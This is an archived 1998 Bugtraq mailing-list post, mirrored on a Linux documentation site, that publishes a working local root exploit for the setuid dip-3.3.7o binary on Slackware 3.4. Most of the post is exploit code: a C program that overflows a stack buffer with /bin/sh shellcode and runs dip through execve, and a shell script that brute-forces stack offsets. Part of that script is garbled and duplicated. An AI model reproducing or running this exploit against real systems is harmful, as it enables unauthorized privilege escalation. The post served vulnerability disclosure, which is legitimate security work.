Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

X-RDate: Sun, 10 May 1998 16:45:03 +0600 (YEKST)
X-UIDL: 35317d34000001e5
Date: Fri, 8 May 1998 01:14:21 +0000
From: zef <zef@promisc.net>
To: BUGTRAQ@NETSPACE.ORG
Subject: dip-3.3.7o exploit

  The following code causes a buffer overrun in dip-3.3.7o that
comes with linux slakware version 3.4  and maybe others.

It can give you root permission if dip file is owned by root and
set-user-id bit is set.

  This problem was mentioned in this list some days ago by Goran Gajic,
and he has also posted some possible ways to correct it.

  The code is too messy... but it works.

Regards,

zef


------------------------------ dipr.c -----------------------------

/*
 * dip-3.3.7o buffer overrun                            07 May 1998
 *
 * sintax: ./dipr <offset>
 *
 *
 *   offset: try increments of 50 between 1500 and 3000
 *
 *   tested in linux with dip version 3.3.7o (slak 3.4).
 *
 *                by zef and r00t @promisc.net
 *
 *                   http://www.promisc.net
 */

#include <stdio.h>
#include <stdlib.h>

static inline getesp()
{
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int jump,i,n;
  unsigned long xaddr;
  char *cmd[5], buf[4096];


char code[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  jump=atoi(argv[1]);

  for (i=0;i<68;i++)
    buf[i]=0x41;

  for (n=0,i=68;i<113;i++)
    buf[i]=code[n++];

  xaddr=getesp()+jump;

  buf[i]=xaddr & 0xff;
  buf[i+1]=(xaddr >> 8) & 0xff;
  buf[i+2]=(xaddr >> 16) & 0xff;
  buf[i+3]=(xaddr >> 24) & 0xff;

  buf[i+4]=xaddr & 0xff;
  buf[i+5]=(xaddr >> 8) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+7]=(xaddr >> 24) & 0xff;

  cmd[0]=malloc(17);
  strcpy(cmd[0],"/sbin/dip-3.3.7o");

  cmd[1]=malloc(3);
  strcpy(cmd[1],"-k");

  cmd[2]=malloc(3);
  strcpy(cmd[2],"-l");

  cmd[3]=buf;

  cmd[4]=NULL;

  execve(cmd[0],cmd,NULL);
}

------------------------------- end -------------------------------


Shell script for easy testing :-)


---------------------------- dipr.test ----------------------------

#/bin/bash
if [ ! -x /sbin/dip-3.3.7o ]
then
  echo "could not find file \"/sbin/dip-3.3.7o\"";
  exit -1
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
  echo "dip executable is not suid"
  exit -1
fi
if [ ! -x ./dipr ]
then
  echo "could not find file \"./dipr\"";
  echo "try compiling dipr.c"
  exit -1
fi

x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
  echo "dip executable is not suid"
  exit -1
fi
if [ ! -x ./dipr ]
then
  echo "could not find file \"./dipr\"";
  echo "try compiling dipr.c"
  exit -1
fi

x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
do
  echo offset=$x
  x=$[x+50]
  ./dipr $x
done
rm -f core

------------------------------- end -------------------------------

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

ПОДПИШИСЬ НА ЖУРНАЛ Linux Format 2012! Журнал "Linux Format" (Линукс Формат)- Единственный в России и странах СНГ журнал на русском языке, посвящённый Linux и свободному ПО. Журнал для IT-директоров, IT-менеджеров, программистов, системных администраторов, учителей школ и преподавателей ВУЗов и всех пользователей ПК. В каждом выпуске: Новости индустрии OpenSource, обзоры новинок свободного ПО, обучающие и методические статьи. Каждый, кто оформит подписку, получает бонусы и подарки- объёмные наклейки на системный блок, диск с архивом номеров за 2005-2011 г.г. и ежемесячно электронную версию журнала в pdf-формате. Оформить подписку на год